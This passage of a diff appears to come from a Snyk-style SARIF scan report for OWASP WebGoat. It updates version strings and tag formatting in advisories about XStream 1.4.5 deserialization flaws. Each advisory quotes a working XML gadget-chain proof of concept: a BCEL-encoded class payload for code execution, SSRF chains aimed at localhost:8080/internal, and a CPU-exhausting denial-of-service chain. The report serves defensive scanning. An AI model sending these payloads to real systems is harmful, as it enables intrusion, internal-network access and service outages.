<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>\r\n                    </a>\r\n                  </outer-class>\r\n                </names>\r\n                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>\r\n                  <parent class='sun.misc.Launcher$ExtClassLoader'>\r\n                  </parent>\r\n                  <package2certs class='hashtable'/>\r\n                  <classes defined-in='java.lang.ClassLoader'/>\r\n                  <defaultDomain>\r\n                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>\r\n                    <principals/>\r\n                    <hasAllPerm>false</hasAllPerm>\r\n                    <staticPermissions>false</staticPermissions>\r\n                    <key>\r\n                      <outer-class reference='../..'/>\r\n                    </key>\r\n                  </defaultDomain>\r\n                  <packages/>\r\n                  <nativeLibraries/>\r\n                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>\r\n                  <defaultAssertionStatus>false</defaultAssertionStatus>\r\n                  <classes/>\r\n                  <ignored__packages>\r\n                    <string>java.</string>\r\n                    <string>javax.</string>\r\n                    <string>sun.</string>\r\n                  </ignored__packages>\r\n                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>\r\n                    <__path>\r\n                      <paths/>\r\n                      <class__path>.</class__path>\r\n                    </__path>\r\n                    <__loadedClasses/>\r\n                  </repository>\r\n                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>\r\n                </processorCL>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>0</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21350.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -486,14 +238,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>\r\n                <configs class='sun.misc.FIFOQueueEnumerator'>\r\n                  <queue>\r\n                    <length>1</length>\r\n                    <head>\r\n                      <obj class='url'>http://localhost:8080/internal/</obj>\r\n                    </head>\r\n                    <tail reference='../head'/>\r\n                  </queue>\r\n                  <cursor reference='../queue/head'/>\r\n                </configs>\r\n                <returned class='sorted-set'/>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>0</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv)\n- [XStream Advisory](https://x-"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>\r\n                <configs class='sun.misc.FIFOQueueEnumerator'>\r\n                  <queue>\r\n                    <length>1</length>\r\n                    <head>\r\n                      <obj class='url'>http://localhost:8080/internal/</obj>\r\n                    </head>\r\n                    <tail reference='../head'/>\r\n                  </queue>\r\n                  <cursor reference='../queue/head'/>\r\n                </configs>\r\n                <returned class='sorted-set'/>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>0</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21349.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 6.1,
                 "security-severity": "6.1"
               }
@@ -508,14 +256,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <is class='java.io.ByteArrayInputStream'>\r\n            <buf></buf>\r\n            <pos>-2147483648</pos>\r\n            <mark>0</mark>\r\n            <count>0</count>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21341.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <is class='java.io.ByteArrayInputStream'>\r\n            <buf></buf>\r\n            <pos>-2147483648</pos>\r\n            <mark>0</mark>\r\n            <count>0</count>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21341.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 7.5,
                 "security-severity": "7.5"
               }
@@ -530,14 +274,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='javax.activation.URLDataSource'>\r\n                <url>http://localhost:8080/internal/:</url>\r\n              </dataSource>\r\n            </message>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21342.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='javax.activation.URLDataSource'>\r\n                <url>http://localhost:8080/internal/:</url>\r\n              </dataSource>\r\n            </message>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21342.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
